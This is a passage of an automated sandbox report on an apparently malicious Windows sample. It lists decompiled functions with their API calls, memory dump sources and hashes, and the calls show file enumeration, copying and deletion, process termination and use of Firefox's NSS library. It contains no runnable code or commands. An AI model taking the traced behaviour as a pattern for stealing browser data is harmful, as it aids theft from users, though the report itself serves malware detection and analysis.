                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002B0C6
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002B27C
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002B297
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002B2E9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 211194620-0
                                                                                                                                                                                          • Opcode ID: 2b70dc7f21d0da7713bc2766be10f809502d1a0ec5c73c75326cfb3b61cee29c
                                                                                                                                                                                          • Instruction ID: 179ecf74358a605fae42c2a385e2d73c6804a6993e743c2deca24c38a35ecaf1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b70dc7f21d0da7713bc2766be10f809502d1a0ec5c73c75326cfb3b61cee29c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5581D832900129EBCF02FBE4ED479DEB775AF14305F614121F904B7167DB60AE8A8BA1
                                                                                                                                                                                          Function 6C435C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount64.KERNEL32 ref: 6C435D40
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49F688), ref: 6C435D67
                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C435DB4
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49F688), ref: 6C435DED
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 557828605-0
                                                                                                                                                                                          • Opcode ID: 8a55d0a0c6cfcf1b55499808a3d4bb6b573d649ea33a6e92eed2a016e3227441
                                                                                                                                                                                          • Instruction ID: fac438344c7a882a1d11910c8b71fa5c41375b28dc049979c6b43e7c242b62ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a55d0a0c6cfcf1b55499808a3d4bb6b573d649ea33a6e92eed2a016e3227441
                                                                                                                                                                                          • Instruction Fuzzy Hash: 02515C71E012398FDF08DFA9C854EAEBBB2FB99304F198619D815A7750C7306D46CB90
                                                                                                                                                                                          Function 6C536C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C536C8D
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C536CA9
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C536CC0
                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C658FE0), ref: 6C536CFE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2370200771-0
                                                                                                                                                                                          • Opcode ID: 2b619bd889308d2c05b0765f15ef473a02be155baeb2c317d35d8d2af95c4da3
                                                                                                                                                                                          • Instruction ID: e6719cbde7d22bfdfe54a1b9141f91788eb62c52213eda7886d0d8b51689b417
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b619bd889308d2c05b0765f15ef473a02be155baeb2c317d35d8d2af95c4da3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A317EB1A002269FDB08CF65CC91ABFBBF5EB89248B10442DD909D7710FB319915CBA0
                                                                                                                                                                                          Function 0003BFC6 Relevance: 6.1, APIs: 4, Instructions: 98timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,759183C0,00000000,?,?,?,?,?,?,0003C58F,?,00036F27,?), ref: 0003C019
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0003C58F,?,00036F27), ref: 0003C049
                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0003C58F,?,00036F27,?), ref: 0003C075
                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0003C58F,?,00036F27,?), ref: 0003C083
                                                                                                                                                                                            • Part of subcall function 0003B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,0A0524C0), ref: 0003B9C5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3986731826-0
                                                                                                                                                                                          • Opcode ID: 243eba4ec7b9849567c7e25a657d428332da4e4337d80d3fce01046dc2be4c62
                                                                                                                                                                                          • Instruction ID: a550c1ace365a50b471f1969fe5f28cbf096dabef87b90ab9b295f18c864de72
                                                                                                                                                                                          • Opcode Fuzzy Hash: 243eba4ec7b9849567c7e25a657d428332da4e4337d80d3fce01046dc2be4c62
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B419A71800249DFDF55DFA9C884A9EBBF8FF48310F10016AE955EB266E3349945CFA0
                                                                                                                                                                                          Function 6C456470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C4582BC,?,?), ref: 6C45649B
                                                                                                                                                                                            • Part of subcall function 6C42CA10: malloc.MOZGLUE(?), ref: 6C42CA26
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4564A9
                                                                                                                                                                                            • Part of subcall function 6C44FA80: GetCurrentThreadId.KERNEL32 ref: 6C44FA8D
                                                                                                                                                                                            • Part of subcall function 6C44FA80: AcquireSRWLockExclusive.KERNEL32(6C49F448), ref: 6C44FA99
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C45653F
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C45655A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3596744550-0
                                                                                                                                                                                          • Opcode ID: d69236fae10cf017b5e555cc2aa86b45d28d92a55838292943124f45790344b0
                                                                                                                                                                                          • Instruction ID: 973b36c6bf2a136957d621854f16f747c59e3137ada3871b0fe0eee135dc3c1d
                                                                                                                                                                                          • Opcode Fuzzy Hash: d69236fae10cf017b5e555cc2aa86b45d28d92a55838292943124f45790344b0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 47316CB5A043159FD700DF25D884E9ABBE4BF88318F40842EE85A97744DB34E919CBD2
                                                                                                                                                                                          Function 0003BD80 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • malloc.MSVCRT ref: 0003BDC5
                                                                                                                                                                                          • _memmove.LIBCMT ref: 0003BDD9
                                                                                                                                                                                          • _memmove.LIBCMT ref: 0003BE26
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,6703F1C6,?,00000000,0A0524C0,?,00000001,0A0524C0,?,0003AE6B,?,00000001,0A0524C0,6703F1C6,?), ref: 0003BE45
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memmove$FileWritemalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 803809635-0
                                                                                                                                                                                          • Opcode ID: 0eef9c98e2934f0632e951d5e6b78949ec79807dfb4c568d3f0f26fe8d2a27b2
                                                                                                                                                                                          • Instruction ID: 884993cf8e9df3eec580e2c79f094ccf901aa08c44ee1450689a26e031a65a37
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0eef9c98e2934f0632e951d5e6b78949ec79807dfb4c568d3f0f26fe8d2a27b2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 27315071600704AFD762CF59D984BABB7FCFB44758F40892EE64687A41DB70F9048B50
                                                                                                                                                                                          Function 000322B0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 000322D7
                                                                                                                                                                                            • Part of subcall function 00031D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00032301,?), ref: 00031D6C
                                                                                                                                                                                            • Part of subcall function 00031D61: HeapAlloc.KERNEL32(00000000), ref: 00031D73
                                                                                                                                                                                            • Part of subcall function 00031D61: wsprintfW.USER32 ref: 00031D84
                                                                                                                                                                                          • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0003237D
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0003238B
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00032392
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2224742867-0
                                                                                                                                                                                          • Opcode ID: 4d0111fe9641b4887003351d3574db1db0104854f09f7c561ee7cfaad75ac613
                                                                                                                                                                                          • Instruction ID: cbe2f7e8d2da3b61780d899aea90067cd3a23c0350cc9720828b1f821d498b6c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d0111fe9641b4887003351d3574db1db0104854f09f7c561ee7cfaad75ac613
                                                                                                                                                                                          • Instruction Fuzzy Hash: 53313EB2A01218AFDF219FA4DC889EE77BCEF0A344F0404A5F509E2551D6349F858F62
                                                                                                                                                                                          Function 0003665F Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 000366A7
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00056B4C), ref: 000366C4
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 000366D7
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00056B50), ref: 000366E9
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 00036018
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindFirstFileA.KERNEL32(?,?), ref: 0003602F
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056AB4), ref: 00036050
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056AB8), ref: 0003606A
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 00036091
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056647), ref: 000360A5
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 000360C2
                                                                                                                                                                                            • Part of subcall function 00035FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 000360EF
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?), ref: 00036125
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,00056AD0), ref: 00036137
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,?), ref: 0003614A
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,00056AD4), ref: 0003615C
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,?), ref: 00036170
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 000360D9
                                                                                                                                                                                            • Part of subcall function 00035FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00036229
                                                                                                                                                                                            • Part of subcall function 00035FD1: DeleteFileA.KERNEL32(?), ref: 0003629D
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindNextFileA.KERNEL32(?,?), ref: 000362FF
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindClose.KERNEL32(?), ref: 00036313
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2104210347-0
                                                                                                                                                                                          • Opcode ID: 7c6b49a2cd97d9f4afc527122d405b0f1da93bb6b0d1183490be05aa0e9deebf
                                                                                                                                                                                          • Instruction ID: 3f58b036d1caf51f716a3dbba3f64cba71b6f394309a75962d09dc1a65476d64
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c6b49a2cd97d9f4afc527122d405b0f1da93bb6b0d1183490be05aa0e9deebf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9021927590011CAFCF50EB60EC46ADDB7BDEB18301F4140E1BA4997261EFB19AC58F51
                                                                                                                                                                                          Function 6C5A2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C5A2E08
                                                                                                                                                                                            • Part of subcall function 6C5914C0: TlsGetValue.KERNEL32 ref: 6C5914E0
                                                                                                                                                                                            • Part of subcall function 6C5914C0: EnterCriticalSection.KERNEL32 ref: 6C5914F5
                                                                                                                                                                                            • Part of subcall function 6C5914C0: PR_Unlock.NSS3 ref: 6C59150D
                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6C5A2E1C
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C5A2E3B
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5A2E95
                                                                                                                                                                                            • Part of subcall function 6C591200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5388A4,00000000,00000000), ref: 6C591228
                                                                                                                                                                                            • Part of subcall function 6C591200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C591238
                                                                                                                                                                                            • Part of subcall function 6C591200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C5388A4,00000000,00000000), ref: 6C59124B
                                                                                                                                                                                            • Part of subcall function 6C591200: PR_CallOnce.NSS3(6C692AA4,6C5912D0,00000000,00000000,00000000,?,6C5388A4,00000000,00000000), ref: 6C59125D
                                                                                                                                                                                            • Part of subcall function 6C591200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C59126F
                                                                                                                                                                                            • Part of subcall function 6C591200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C591280
                                                                                                                                                                                            • Part of subcall function 6C591200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C59128E
                                                                                                                                                                                            • Part of subcall function 6C591200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C59129A
                                                                                                                                                                                            • Part of subcall function 6C591200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C5912A1
                                                                                                                                                                                          Memory Dump Source
